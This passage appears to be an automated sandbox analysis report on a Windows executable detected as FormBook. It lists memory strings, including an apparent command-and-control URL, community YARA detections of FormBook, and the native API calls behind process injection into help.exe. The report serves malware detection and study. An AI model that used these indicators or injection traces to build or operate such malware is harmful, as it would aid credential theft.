          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&ut
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004181CE NtCreateFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A10 NtQuerySection,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19560 NtWriteFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B196D0 NtCreateKey,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1A770 NtOpenThread,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19760 NtOpenProcess,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004181CE NtCreateFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004183AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004181D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00418280 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00418300 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004181CE NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041827A NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_73611A98
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041C0A9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041C1CD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B992
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041C2A7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041A302
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00408C6B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00408C70
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B4B3
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041BD9E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA20A8
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB090
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91002
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADF900
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0EBB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE841F
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AED5E0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD0D20
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA1D55
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA2EF7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF6E30
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041C0A9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041C1CD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B992
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041C2A7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041A302
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00408C6B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00408C70
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B4B3
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C020A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C025DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B30D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C01D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C02D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C02EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C022AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B56E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C01FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C02B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041A302
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00408C6B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00408C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00402D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00402D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00402FB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: String function: 00419F80 appears 34 times
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B3B150 appears 35 times
          Source: 5t2CmTUhKc.exe, 00000000.00000003.340429454.0000000009AFF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5t2CmTUhKc.exe
          Source: 5t2CmTUhKc.exe, 00000002.00000002.417241372.0000000000D5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5t2CmTUhKc.exe
          Source: 5t2CmTUhKc.exe, 00000002.00000002.416438453.0000000000AA4000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs 5t2CmTUhKc.exe
          Source: 5t2CmTUhKc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
